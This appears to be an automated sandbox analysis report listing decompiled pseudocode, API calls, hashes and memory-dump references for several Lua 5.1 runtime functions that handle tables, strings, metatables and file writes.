Instruction ID: df9659d915e56ac0ddd2f7f2d60a8c731e5a9bc04004863a78c3cee6939b6138
Opcode Fuzzy Hash: 4796256d7e268d173b5bc1796e400875b3bb1527d8b152e7860e322b0da00a4f
Instruction Fuzzy Hash: 0CE0C96264A531319D02362D2C02F9E114A4FC3336F290354F535B62D2DE45964741EE

Uniqueness

Uniqueness Score: -1.00%

Function 10016B00, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10016B00(void* __ebx, void* __eflags, intOrPtr _a4) {
				void* _t3;
				void* _t11;
				void* _t13;
				void* _t14;

				_t12 = _a4;
				E1000F410(__ebx, __eflags, _a4, 1, 5);
				_t3 = E10001CC0(__eflags, _a4, 1);
				_t14 = _t13 + 0x14;
				_t17 = _t3;
				if(_t3 == 0) {
					E10001C70(_t12, _t3, 1);
					E100013D0(_t17, _t12, 0xffffffff);
					E10001F20(_t17, _t12, 1);
					_t14 = _t14 + 0x1c;
				}
				E100013D0(_t17, _t12, 0xffffd8ee);
				E10001DD0(_t11, _t17, _t12, 0xfffffffe, "__index");
				return 0;
			}

0x10016b01
0x10016b0a
0x10016b12
0x10016b17
0x10016b1a
0x10016b1c
0x10016b22
0x10016b2a
0x10016b32
0x10016b37
0x10016b37
0x10016b40
0x10016b4d
0x10016b58

APIs

luaL_checktype.LUA5.1(?,00000001,00000005), ref: 10016B0A

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

lua_getmetatable.LUA5.1(?,00000001,?,00000001,00000005), ref: 10016B12
lua_createtable.LUA5.1(?,00000000,00000001), ref: 10016B22
lua_pushvalue.LUA5.1(?,000000FF,?,00000000,00000001), ref: 10016B2A
lua_setmetatable.LUA5.1(?,00000001,?,000000FF,?,00000000,00000001), ref: 10016B32
lua_pushvalue.LUA5.1(?,FFFFD8EE), ref: 10016B40
lua_setfield.LUA5.1(?,000000FE,__index,?,FFFFD8EE), ref: 10016B4D

Strings

__index, xrefs: 10016B45

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushvalue.$L_checktype.lua_createtable.lua_getmetatable.lua_setfield.lua_setmetatable.lua_type.
String ID: __index
API String ID: 2247695975-4084755486
Opcode ID: 42f45c73c4efdcb6ec794b913c50cc92af24fb161dd5d39f1c6f0b4717ac5300
Instruction ID: f5213d6870487c8dc58f413cbca6ef4a688f92bb89149c49d54578d0bf0596f7
Opcode Fuzzy Hash: 42f45c73c4efdcb6ec794b913c50cc92af24fb161dd5d39f1c6f0b4717ac5300
Instruction Fuzzy Hash: FAE0127955953131F812B1283C43FDF10499F137E4F110250F914755CBEED6B69200EE

Uniqueness

Uniqueness Score: -1.00%

Function 00993540, Relevance: 13.6, APIs: 9, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00993540(long long __fp0) {
				signed int _t15;
				void* _t19;
				signed int _t20;
				void* _t23;
				intOrPtr _t25;
				intOrPtr* _t27;
				intOrPtr* _t29;
				intOrPtr* _t34;
				intOrPtr _t36;
				signed int _t37;
				void* _t38;
				void* _t39;
				long long* _t40;
				void* _t41;
				void* _t43;
				long long* _t44;
				long long _t46;

				_t46 = __fp0;
				_t15 =  *((intOrPtr*)(_t38 + 0xc));
				_t36 =  *((intOrPtr*)(_t38 + 0x10));
				_push(_t15);
				_push(_t36);
				_t37 = 0;
				 *((intOrPtr*)(_t38 + 0x10)) = 1;
				L00994AFA();
				_t39 = _t38 + 8;
				if(_t15 != 0) {
					_t34 =  *((intOrPtr*)(_t39 + 0x24));
					while(1) {
						asm("fild dword [esp+0x10]");
						_t40 = _t39 - 8;
						 *_t40 = _t46;
						_push(_t36);
						L00994B5A();
						_push( *((intOrPtr*)(_t40 + 0x28)));
						_push(_t36);
						L00994B00();
						_push(0xffffffff);
						_push(_t36);
						L00994AFA();
						_t41 = _t40 + 0x1c;
						if(_t15 == 0) {
							break;
						}
						_t23 = E009934D0(_t15, _t36);
						_t43 = _t41 + 4;
						if(_t23 != 0xffffffff) {
							_t19 = E00993650(_t17, _t36);
							_t43 = _t43 + 4;
							if(_t19 != 0) {
								_t37 = _t37 + 1;
								_t44 = _t43 - 8;
								 *((intOrPtr*)(_t44 + 0x20)) = _t37;
								asm("fild dword [esp+0x20]");
								 *_t44 = _t46;
								_push(_t36);
								L00994B5A();
								_push(0xfffffffe);
								_push(_t36);
								L00994B90();
								_push( *((intOrPtr*)(_t44 + 0x34)));
								_push(_t36);
								L00994B42();
								_t25 =  *_t34;
								_t43 = _t44 + 0x1c;
								_t20 = 0;
								if(_t25 > 0) {
									_t29 = _t34 + 4;
									while( *_t29 != _t23) {
										_t20 = _t20 + 1;
										_t29 = _t29 + 4;
										if(_t20 < _t25) {
											continue;
										} else {
										}
										goto L15;
									}
									if(_t20 < _t25 - 1) {
										_t27 = _t34 + 4 + _t20 * 4;
										do {
											_t20 = _t20 + 1;
											 *_t27 =  *((intOrPtr*)(_t27 + 4));
											_t27 = _t27 + 4;
										} while (_t20 <  *_t34 - 1);
									}
									 *_t34 =  *_t34 - 1;
								}
							}
						}
						L15:
						_push(0xfffffffe);
						_push(_t36);
						L00994AB8();
						_t39 = _t43 + 8;
						_t15 =  *((intOrPtr*)(_t43 + 0x18)) + 1;
						 *((intOrPtr*)(_t39 + 0x10)) = _t15;
					}
					_push(0xfffffffe);
					_push(_t36);
					L00994AB8();
					return _t37;
				} else {
					return _t15;
				}
			}

0x00993540
0x00993541
0x00993547
0x0099354b
0x0099354c
0x0099354d
0x0099354f
0x00993557
0x0099355c
0x00993561
0x00993569
0x0099356d
0x0099356d
0x00993571
0x00993574
0x00993577
0x00993578
0x00993581
0x00993582
0x00993583
0x00993588
0x0099358a
0x0099358b
0x00993590
0x00993595
0x00000000
0x00000000
0x009935a1
0x009935a3
0x009935a9
0x009935ac
0x009935b1
0x009935b6
0x009935b8
0x009935b9
0x009935bc
0x009935c0
0x009935c4
0x009935c7
0x009935c8
0x009935cd
0x009935cf
0x009935d0
0x009935d9
0x009935da
0x009935db
0x009935e0
0x009935e2
0x009935e5
0x009935e9
0x009935eb
0x009935ee
0x009935f2
0x009935f3
0x009935f8
0x00000000
0x00000000
0x009935fa
0x00000000
0x009935f8
0x009935ff
0x00993601
0x00993605
0x00993608
0x00993609
0x0099360d
0x00993611
0x00993605
0x00993615
0x00993615
0x009935e9
0x009935b6
0x00993617
0x00993617
0x00993619
0x0099361a
0x00993623
0x00993626
0x00993627
0x00993627
0x00993630
0x00993632
0x00993633
0x00993642
0x00993566
0x00993566
0x00993566

APIs

lua_type.LUA5.1(000000FF,00000000,?,?,?,009932D4,?,00000001,?,?,?,00000001), ref: 00993557
lua_pushnumber.LUA5.1(000000FF,00000000,00000000,?,?), ref: 00993578
lua_gettable.LUA5.1(000000FF,?,000000FF,00000000,00000000,?,?), ref: 00993583
lua_type.LUA5.1(000000FF,000000FF,000000FF,?,000000FF,00000000,00000000,?,?), ref: 0099358B
lua_pushnumber.LUA5.1(000000FF), ref: 009935C8
lua_pushvalue.LUA5.1(000000FF,000000FE,000000FF), ref: 009935D0
lua_settable.LUA5.1(000000FF,?,000000FF,000000FE,000000FF), ref: 009935DB
lua_settop.LUA5.1(000000FF,000000FE,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0099361A
lua_settop.LUA5.1(000000FF,000000FE,?,?,?,?,?,?,?,?,?,?,?), ref: 00993633

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.lua_settop.lua_type.$lua_gettable.lua_pushvalue.lua_settable.
String ID:
API String ID: 3827969124-0
Opcode ID: 0ec92852d32b06c178a02502c8f102c15879312fc74ece6adb0a5c77dbdb7b6f
Instruction ID: e555db461b86c7f09da58820ac0fbaf18ee8cf2abdcb5149d7b40011b63ab6a7
Opcode Fuzzy Hash: 0ec92852d32b06c178a02502c8f102c15879312fc74ece6adb0a5c77dbdb7b6f
Instruction Fuzzy Hash: C62127301052126BCE01AF5C9C42E6FB399FFC5325F248B2CF46692281EB21DA1687E7

Uniqueness

Uniqueness Score: -1.00%

Function 009933E0, Relevance: 13.6, APIs: 9, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E009933E0(long long __fp0, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				signed int _t26;
				signed int* _t31;
				intOrPtr _t35;
				signed int _t38;
				void* _t41;
				long long* _t42;
				void* _t43;
				void* _t45;
				long long* _t46;
				long long _t48;

				_t48 = __fp0;
				_t16 = _a8;
				_t35 = _a4;
				_push(_t16);
				_push(_t35);
				_v16 = 1;
				L00994AFA();
				_t41 = (_t38 & 0xfffffff8) - 0xc + 8;
				if(_t16 != 0) {
					_t31 = _a20;
					_t22 = _a12;
					while(1) {
						asm("fild dword [esp+0xc]");
						_t42 = _t41 - 8;
						 *_t42 = _t48;
						_push(_t35);
						L00994B5A();
						_push(_a8);
						_push(_t35);
						L00994B00();
						_push(0xffffffff);
						_push(_t35);
						L00994AFA();
						_t43 = _t42 + 0x1c;
						if(_t16 == 0) {
							break;
						}
						_t18 = E009934D0(_t16, _t35);
						_t45 = _t43 + 4;
						if(_t18 != 0xffffffff) {
							_t26 =  *_t31;
							if(_t26 < 0x40) {
								 *((intOrPtr*)(_t31 + 4 + _t26 * 4)) = _t18;
								 *_t31 =  *_t31 + 1;
							}
							if(_t22 == 0xffffffff || _t22 < _t18) {
								_t22 = _t18;
							}
							_v12 = _t18;
							_v8 = 0;
							asm("fild qword [esp+0x10]");
							_t46 = _t45 - 8;
							 *_t46 = _t48;
							_push(_t35);
							L00994B5A();
							_push(0xfffffffe);
							_push(_t35);
							L00994B90();
							_push(_a16);
							_push(_t35);
							L00994B42();
							_t45 = _t46 + 0x1c;
						}
						_push(0xfffffffe);
						_push(_t35);
						L00994AB8();
						_t41 = _t45 + 8;
						_t16 = _v16 + 1;
						_v16 = _t16;
					}
					_push(0xfffffffe);
					_push(_t35);
					L00994AB8();
					return _t22;
				} else {
					return _a12;
				}
			}

0x009933e0
0x009933e9
0x009933ee
0x009933f2
0x009933f3
0x009933f4
0x009933fc
0x00993401
0x00993406
0x00993412
0x00993415
0x00993418
0x00993418
0x0099341c
0x0099341f
0x00993422
0x00993423
0x0099342b
0x0099342c
0x0099342d
0x00993432
0x00993434
0x00993435
0x0099343a
0x0099343f
0x00000000
0x00000000
0x00993442
0x00993447
0x0099344d
0x0099344f
0x00993454
0x00993456
0x0099345d
0x0099345d
0x00993462
0x00993468
0x00993468
0x0099346a
0x0099346e
0x00993476
0x0099347a
0x0099347d
0x00993480
0x00993481
0x00993486
0x00993488
0x00993489
0x00993491
0x00993492
0x00993493
0x00993498
0x00993498
0x0099349b
0x0099349d
0x0099349e
0x009934a7
0x009934aa
0x009934ab
0x009934ab
0x009934b4
0x009934b6
0x009934b7
0x009934c7
0x00993408
0x00993411
0x00993411

APIs

lua_type.LUA5.1 ref: 009933FC
lua_pushnumber.LUA5.1(?,?,?,?,00000000,00000000,?,?), ref: 00993423
lua_gettable.LUA5.1(?,00000000,?,?,?,?,00000000,00000000,?,?), ref: 0099342D
lua_type.LUA5.1(?,000000FF,?,00000000,?,?,?,?,00000000,00000000,?,?), ref: 00993435
lua_pushnumber.LUA5.1(?), ref: 00993481
lua_pushvalue.LUA5.1(?,000000FE,?), ref: 00993489
lua_settable.LUA5.1(?,?,?,000000FE,?), ref: 00993493
lua_settop.LUA5.1(?,000000FE,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 0099349E
lua_settop.LUA5.1(?,000000FE,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 009934B7

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.lua_settop.lua_type.$lua_gettable.lua_pushvalue.lua_settable.
String ID:
API String ID: 3827969124-0
Opcode ID: 054bf2a5ebc7917d8ab71b0ccfb04ac21e8c556905b87f119fdee70103717eed
Instruction ID: f0260cb879bb001470fe8aa77a0be2ffa63168b40b64af30547b8d3e6005fc7e
Opcode Fuzzy Hash: 054bf2a5ebc7917d8ab71b0ccfb04ac21e8c556905b87f119fdee70103717eed
Instruction Fuzzy Hash: 2021D6715056156BCF01BE2C9C41E5E7398AF85335F108728F879932C1EB309A2687E7

Uniqueness

Uniqueness Score: -1.00%

Function 00A23400, Relevance: 13.6, APIs: 9, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00A23400(intOrPtr* __eax, intOrPtr _a4) {
				intOrPtr* _t4;
				intOrPtr _t9;
				void* _t10;
				intOrPtr _t15;
				void* _t16;
				void* _t17;
				void* _t18;

				_t15 = _a4;
				_push(1);
				_push(_t15);
				L00A23F4A();
				_t17 = _t16 + 8;
				if(__eax != 0) {
					_push(2);
					_push(1);
					_push(_t15);
					L00A23F92();
					_push(1);
					_push(_t15);
					L00A23F0E();
					_push(_t15);
					_t12 = __eax;
					L00A23F38();
					_t18 = _t17 + 0x18;
					if(__eax < 2) {
						L5:
						_t4 = _t12;
						_t2 = _t4 + 1; // 0x1
						_t10 = _t2;
						do {
							_t9 =  *_t4;
							_t4 = _t4 + 1;
						} while (_t9 != 0);
						_push(_t4 - _t10);
						_push(_t12);
						_push(_t15);
						L00A23FC8();
						return 1;
					} else {
						_push(2);
						_push(_t15);
						L00A23F4A();
						_t18 = _t18 + 8;
						if(__eax == 0) {
							goto L5;
						} else {
							_push(2);
							_push(_t15);
							L00A23FCE();
							_push(__eax);
							_push(__eax);
							_push(_t15);
							L00A23FC8();
							return 1;
						}
					}
				} else {
					_push(_t15);
					L00A23F74();
					return 1;
				}
			}

0x00a23401
0x00a23405
0x00a23407
0x00a23408
0x00a2340d
0x00a23412
0x00a23425
0x00a23427
0x00a23429
0x00a2342a
0x00a2342f
0x00a23431
0x00a23432
0x00a23437
0x00a23438
0x00a2343a
0x00a2343f
0x00a23445
0x00a23474
0x00a23474
0x00a23476
0x00a23476
0x00a23480
0x00a23480
0x00a23482
0x00a23485
0x00a2348b
0x00a2348c
0x00a2348d
0x00a2348e
0x00a2349d
0x00a23447
0x00a23447
0x00a23449
0x00a2344a
0x00a2344f
0x00a23454
0x00000000
0x00a23456
0x00a23456
0x00a23458
0x00a23459
0x00a23461
0x00a23462
0x00a23463
0x00a23464
0x00a23473
0x00a23473
0x00a23454
0x00a23414
0x00a23414
0x00a23415
0x00a23423
0x00a23423

APIs

lua_type.LUA5.1(?,00000001), ref: 00A23408
lua_pushnil.LUA5.1(?), ref: 00A23415
luaL_checktype.LUA5.1(?,00000001,00000002), ref: 00A2342A
lua_touserdata.LUA5.1(?,00000001,?,00000001,00000002), ref: 00A23432
lua_gettop.LUA5.1(?,?,00000001,?,00000001,00000002), ref: 00A2343A
lua_type.LUA5.1(?,00000002), ref: 00A2344A
luaL_checkinteger.LUA5.1(?,00000002), ref: 00A23459
lua_pushlstring.LUA5.1(?,00000000,00000000), ref: 00A23464

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_checkinteger.L_checktype.lua_gettop.lua_pushlstring.lua_pushnil.lua_touserdata.
String ID:
API String ID: 1571642718-0
Opcode ID: 897801a759e92f7ae12d4418ca1fe753c30fee061592d6ce51bde72346a80e0d
Instruction ID: 7985499283d76a8ff19b92cdfddb0848a645ca462e94a6332481bcb5b3a45f73
Opcode Fuzzy Hash: 897801a759e92f7ae12d4418ca1fe753c30fee061592d6ce51bde72346a80e0d
Instruction Fuzzy Hash: 8B0175A3E5523032ED21322C7F07FDF515D4F93705F048571F9049E282E68E9B5641E2

Uniqueness

Uniqueness Score: -1.00%

Function 10013C60, Relevance: 13.6, APIs: 9, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10013C60(void* __eflags, void* __fp0, intOrPtr _a4) {
				void* __ebx;
				void* _t10;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t25;

				_t25 = __fp0;
				_t20 = __eflags;
				_t16 = _a4;
				E1000F410(_t13, __eflags, _a4, 1, 5);
				_t14 = E10001770(_t13, __eflags, _t16, 1);
				E1000F410(_t14, _t20, _t16, 2, 6);
				_t15 = 1;
				_t18 = _t17 + 0x20;
				_t21 = _t14 - 1;
				if(_t14 < 1) {
					L3:
					return 0;
				} else {
					while(1) {
						E100013D0(_t21, _t16, 2);
						_push(_t15);
						E10001910(_t25, _t16);
						E10001C30(_t21, _t25, _t16, 1, _t15);
						E10002070(_t16, 2, 1);
						_t10 = E10001410(_t21, _t16, 0xffffffff);
						_t19 = _t18 + 0x30;
						if(_t10 != 0) {
							break;
						}
						E10001160(_t16, 0xfffffffe);
						_t18 = _t19 + 8;
						_t15 = _t15 + 1;
						if(_t15 <= _t14) {
							continue;
						} else {
							goto L3;
						}
						goto L5;
					}
					return 1;
				}
				L5:
			}

0x10013c60
0x10013c60
0x10013c62
0x10013c6c
0x10013c7e
0x10013c80
0x10013c85
0x10013c8a
0x10013c8d
0x10013c8f
0x10013cd4
0x10013cd7
0x10013c91
0x10013c91
0x10013c94
0x10013c99
0x10013c9b
0x10013ca4
0x10013cae
0x10013cb6
0x10013cbb
0x10013cc0
0x00000000
0x00000000
0x10013cc5
0x10013cca
0x10013ccd
0x10013cd0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10013cd0
0x10013ce0
0x10013ce0
0x00000000

APIs

luaL_checktype.LUA5.1(?,00000001,00000005), ref: 10013C6C

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

lua_objlen.LUA5.1(?,00000001,?,00000001,00000005), ref: 10013C74
luaL_checktype.LUA5.1(?,00000002,00000006,?,00000001,?,00000001,00000005), ref: 10013C80
lua_pushvalue.LUA5.1(?,00000002), ref: 10013C94
lua_pushinteger.LUA5.1(?,00000001,?,00000002), ref: 10013C9B
lua_rawgeti.LUA5.1(?,00000001,00000001,?,00000001,?,00000002), ref: 10013CA4
lua_call.LUA5.1(?,00000002,00000001,?,00000001,00000001,?,00000001,?,00000002), ref: 10013CAE
lua_type.LUA5.1(?,000000FF,?,00000002,00000001,?,00000001,00000001,?,00000001,?,00000002), ref: 10013CB6
lua_settop.LUA5.1(?,000000FE), ref: 10013CC5

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checktype.lua_type.$lua_call.lua_objlen.lua_pushinteger.lua_pushvalue.lua_rawgeti.lua_settop.
String ID:
API String ID: 585797696-0
Opcode ID: ee12eecbc88c153ff8548ee395100c468ca2ae4be1030798645026142278667f
Instruction ID: 9cdc77a15441d6df1d088767ad2b50c2d28cb10efdd9af7734d254f0433b841c
Opcode Fuzzy Hash: ee12eecbc88c153ff8548ee395100c468ca2ae4be1030798645026142278667f
Instruction Fuzzy Hash: 55F0F63A75662031F52191682C87FCF024ECFC2BE5F144525F610B91C7E9D7BAD212EA

Uniqueness

Uniqueness Score: -1.00%

Function 10014740, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E10014740(void* __eflags, void* __fp0, char _a4) {
				intOrPtr _v4;
				intOrPtr _t17;
				void* _t25;
				intOrPtr _t28;
				void* _t33;
				void* _t38;
				char _t40;
				void* _t41;
				void* _t46;
				void* _t47;

				_t53 = __fp0;
				_t48 = __eflags;
				_t40 = _a4;
				_v4 = E1000F4A0(__eflags, _t40, 1,  &_a4);
				_t25 = E100144C0(E1000F600(__eflags, __fp0, _t40, 2, 1), _a4);
				_t17 = E100144C0(E1000F600(_t48, __fp0, _t40, 3, _t25), _a4);
				_t46 = _t41 + 0x34;
				if(_t25 <= 0) {
					_t25 = 1;
				}
				_t28 = _a4;
				if(_t17 > _t28) {
					_t17 = _t28;
				}
				if(_t25 <= _t17) {
					_t38 = _t17 - _t25 + 1;
					__eflags = _t38 + _t25 - _t17;
					if(_t38 + _t25 <= _t17) {
						_push("string slice too long");
						_push(_t40);
						E1000F230();
						_t46 = _t46 + 8;
					}
					E1000F3E0(_t40, _t38, "string slice too long");
					_t47 = _t46 + 0xc;
					_t33 = 0;
					__eflags = _t38;
					if(_t38 > 0) {
						do {
							_push(0);
							E10001910(_t53, _t40);
							_t47 = _t47 + 8;
							_t33 = _t33 + 1;
							__eflags = _t33 - _t38;
						} while (_t33 < _t38);
					}
					return _t38;
				} else {
					return 0;
				}
			}

0x10014740
0x10014740
0x10014747
0x1001475b
0x1001477a
0x1001478a
0x1001478f
0x10014794
0x10014796
0x10014796
0x1001479b
0x100147a1
0x100147a3
0x100147a3
0x100147a7
0x100147b5
0x100147b9
0x100147bb
0x100147bd
0x100147c2
0x100147c3
0x100147c8
0x100147c8
0x100147d2
0x100147d7
0x100147da
0x100147dc
0x100147de
0x100147e8
0x100147ed
0x100147ef
0x100147f4
0x100147f7
0x100147f8
0x100147f8
0x100147e8
0x10014803
0x100147aa
0x100147ae
0x100147ae

APIs

luaL_checklstring.LUA5.1(?,00000001,?), ref: 1001474F

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

luaL_optinteger.LUA5.1(?,00000002,00000001,?), ref: 10014765

Part of subcall function 1000F600: lua_type.LUA5.1(?,?), ref: 1000F60C

luaL_optinteger.LUA5.1(?,00000003,00000000,?,?,?,?,?,?), ref: 10014781

Part of subcall function 1000F600: luaL_checkinteger.LUA5.1(?,?), ref: 1000F621

luaL_error.LUA5.1(?,string slice too long,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100147C3

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

luaL_checkstack.LUA5.1(?,00000001,string slice too long,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100147D2
lua_pushinteger.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100147EF

Strings

string slice too long, xrefs: 100147BD, 100147CB

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_optinteger.$L_checkinteger.L_checklstring.L_checkstack.L_error.L_where.lua_concat.lua_error.lua_pushinteger.lua_pushvfstring.lua_tolstring.lua_type.
String ID: string slice too long
API String ID: 3324749499-1108821975
Opcode ID: 3952b07f33f4189af710d6d2c6914c3402bbd554bfb495256c4e8dd2a40fbbce
Instruction ID: d06ce83b699cc46522e71059813a6cd78ed58aeef6fbbd112ff21688a20b49f8
Opcode Fuzzy Hash: 3952b07f33f4189af710d6d2c6914c3402bbd554bfb495256c4e8dd2a40fbbce
Instruction Fuzzy Hash: 2211ECBA6052052FE700DA64ACC2F7B738CDB91299F150538FD459B187FA72FD8543A1

Uniqueness

Uniqueness Score: -1.00%

Function 10012990, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10012990(void* __eflags, long long __fp0, intOrPtr _a4, struct _IO_FILE* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				int _v12;
				void* _t11;
				void* _t12;
				intOrPtr* _t13;
				intOrPtr* _t15;
				void* _t16;
				void* _t18;
				int _t20;
				int _t22;
				intOrPtr _t33;
				int _t35;
				signed int _t37;
				long long* _t40;
				intOrPtr _t44;
				long long _t49;

				_t49 = __fp0;
				_t24 = _a4;
				_t11 = E10001150(_a4);
				_t40 = (_t37 & 0xfffffff8) - 0xc + 4;
				_t12 = _t11 - 1;
				_t13 = _t12 - 1;
				_t35 = 1;
				if(_t12 != 0) {
					_t33 = _a12;
					_t15 = _t13 + 1;
					_t44 = _t15;
					_v8 = _t15;
					do {
						_t16 = E10001410(_t44, _t24, _t33);
						_t40 = _t40 + 8;
						if(_t16 != 3) {
							_t18 = E1000F4A0(__eflags, _t24, _t33,  &_v12);
							_t40 = _t40 + 0xc;
							__eflags = _t35;
							if(_t35 == 0) {
								goto L9;
							} else {
								_t20 = fwrite(_t18, 1, _v12, _a8);
								_t40 = _t40 + 0x10;
								__eflags = _t20 - _v12;
								if(__eflags != 0) {
									goto L9;
								} else {
									_t35 = 1;
								}
							}
						} else {
							_t46 = _t35;
							if(_t35 == 0) {
								L9:
								_t35 = 0;
								__eflags = 0;
							} else {
								E10001630(_t46, _t49, _t24, _t33);
								 *_t40 = _t49;
								_t22 = fprintf(_a8, "%.14g");
								_t40 = _t40 + 0x10;
								if(_t22 <= 0) {
									goto L9;
								} else {
									_t35 = 1;
								}
							}
						}
						_t33 = _t33 + 1;
						_t13 = _v8 - 1;
						_v8 = _t13;
					} while (_t13 != 0);
				}
				return E10012160(_t13, _t49, _t24, _t35, 0);
			}

0x10012990
0x1001299a
0x100129a0
0x100129a5
0x100129a8
0x100129ab
0x100129ae
0x100129b3
0x100129b9
0x100129bc
0x100129bc
0x100129bd
0x100129c1
0x100129c3
0x100129c8
0x100129ce
0x10012a02
0x10012a07
0x10012a0a
0x10012a0c
0x00000000
0x10012a0e
0x10012a1a
0x10012a24
0x10012a27
0x10012a29
0x00000000
0x10012a2b
0x10012a2b
0x10012a2b
0x10012a29
0x100129d0
0x100129d0
0x100129d2
0x10012a32
0x10012a32
0x10012a32
0x100129d4
0x100129d6
0x100129db
0x100129e7
0x100129ed
0x100129f2
0x00000000
0x100129f4
0x100129f4
0x100129f4
0x100129f2
0x100129d2
0x10012a38
0x10012a39
0x10012a3a
0x10012a3a
0x100129c1
0x10012a52

APIs

lua_gettop.LUA5.1(?), ref: 100129A0
lua_type.LUA5.1(?,?), ref: 100129C3
lua_tonumber.LUA5.1(?,?), ref: 100129D6
fprintf.MSVCRT ref: 100129E7
luaL_checklstring.LUA5.1(?,?,?), ref: 10012A02
fwrite.MSVCRT ref: 10012A1A

Strings

%.14g, xrefs: 100129E1

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checklstring.fprintffwritelua_gettop.lua_tonumber.lua_type.
String ID: %.14g
API String ID: 1976426754-3267037135
